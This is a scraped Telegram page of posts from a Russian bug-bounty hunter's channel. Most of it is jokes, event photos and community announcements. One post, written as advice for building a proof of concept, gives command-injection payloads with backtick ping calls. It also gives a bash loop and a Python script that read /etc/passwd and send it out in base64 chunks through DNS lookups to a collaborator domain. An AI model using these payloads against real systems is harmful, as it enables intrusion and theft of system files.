Warning: Undefined array key 0 in /var/www/tgoop/function.php on line 65

Warning: Trying to access array offset on value of type null in /var/www/tgoop/function.php on line 65
- Telegram Web
Telegram Web
Forwarded from Bimbosecurity
Мась, че ты мне со своим багбаунти???
Вот правда там так сложного отчетики потриажить?
Я вот как-то судила мужской конкурс «Трусики в облипочку», вот там реально сложно было… 💋💅🤠
Please open Telegram to view this post
VIEW IN TELEGRAM
Если когда-нибудь на стендоффе выйдет багбаунти с Омской областью, то там будет всего одно недопустимое событие - покинуть Омск
Тут кажется DeepSeek протек.
Но это же ведь не повод не загружать туда сорцы с апи ключами? 🧐

Хорошая новость - уязвимость уже закрыли.
Плохая новость - уязвимостью уже мог кто-то воспользоваться.
Please open Telegram to view this post
VIEW IN TELEGRAM
Получается, слетал в рабочую командировку на концерт Билана..🫡
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
Омский багхантер
Традиции нарушать нельзя 🫡
Традиционное базированное фото с любимой
Обнаружил хорошую доку по внутреннему пентесту/редтиму. Рокет сайнса здесь нет, но для актуализации знаний прям что надо.

Тоже самое, но только в виде репозитория: тык
Вы же не забыли отправить «валентинки» в багбаунти программы?
Встретился тут с ситуацией, когда есть RCE, но вытащить выводы команд можно было только через DNS'ку:


name=val`ping -с 1 $(whoami).collaborator`ue


Получение вывода root в поддомене, конечно, приятно, но хотелось что-то валиднее для PoC'а. Однако, нужно помнить:


Максимальная длина доменного имени, включая поддомены, составляет 253 символа. Однако каждый отдельный уровень домена не может превышать 63 символа.


Поэтому я тут чуть посидел, почитал статейки, сам что-то пописал на баше и получил 2 удобные нагрузки для использования:

Получение части от вывода команды

Логика работы: исполнение команды, обрезание её вывода до диапазона от 1 до 30 символа(далее меняете под себя), после чего это всё кодируется в base64 и отправляется в поддомене


`ping -c 1 $(id | cut -c1-30| base64 | tr -d '=').domain.com`


Чтение всего файла по частям

Логика работы: файл читается построчно, если вся закодированная в base64 строка маленькая(40 символов), то отправляется DNS-запрос с base64 данными в поддомене(перед строкой добавляется L{номер_строки} и дальше уже идут base64 данные). Если строка длиннее, то она отправляется кусками с префиксом для удобства(L{номер_строки}P{какая_часть_от_base64_строки}D и потом данные)


bash -c 'border=40; domain=".collaborator"; delay=3; lineNumber=1; while IFS= read -r line; do encoded=$(echo -n "$line" | base64 | tr -d "="); parts=$(echo "$encoded" | fold -w "$border"); part=1; echo "$parts" | while read -r chunk; do if [ $(echo "$parts" | wc -l) -gt 1 ]; then nslookup "L${lineNumber}P${part}D${chunk}${domain}"; else nslookup "L${lineNumber}${chunk}${domain}"; fi; sleep "$delay"; part=$((part + 1)); done; lineNumber=$((lineNumber + 1)); done < /etc/passwd'


Данный bash я делал по ранее написанному python-коду:


import os, base64, time

border, domain, delay = 40, ".collaborator", 3

with open('/etc/passwd') as file:
for lineNumber, line in enumerate(file, 1):
encoded = base64.b64encode(line.strip().encode()).decode().replace('=', '')
parts = [encoded[i:i+border] for i in range(0, len(encoded), border)]

for part, chunk in enumerate(parts, 1):
os.system(f'nslookup "L{lineNumber}{f"P{part}D" if len(parts) > 1 else ""}{chunk}{domain}"')
time.sleep(delay)


Также попутно хочу поделиться полезными ссылками по этой теме:
- https://notsosecure.com/out-band-exploitation-oob-cheatsheet
- https://github.com/dhmosfunk/DNSEXFIL
- https://gist.github.com/Spix0r/6b38a02be0409ba3679d71c30a6db9a9

P.S. Если base64 не катит, то просто поменяйте на hex
Forwarded from BI.ZONE Bug Bounty
😆 (Не)секретный чатик багхантеров

А вы знаете, что у нашего комьюнити есть чат, в котором общаются исследователи и команда платформы? Там уже больше 250 человек, не хватает только вас!

Залетайте в чат, чтобы:

🔵Общаться с другими хантерами.
🔵Получать помощь и делиться опытом.
🔵Быть на связи с командой платформы.
🔵Оставаться в курсе новостей.
🔵Вместе посещать багбаунти-ивенты.
🔵Делиться мемами и просто болтать о багхантинге.

Присоединяйтесь, будем вместе прокачиваться в работе с уязвимостями ;)
Please open Telegram to view this post
VIEW IN TELEGRAM
Добро пожаловать в Омское бб
by @tembitt
Смотрите что нашел 😏
ТАК ПРОШЛО АФТЕПАТИ BUGS ZONE 4.0

Победили в кальянном покере, душевно пообщались со всеми хакерами и вендорами. А еще попели песни в караоке 🥴

Было бы здорово почаще собираться и устраивать такие классные ламповые мероприятия ❤️
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
2025/05/11 22:19:07
Back to Top
HTML Embed Code: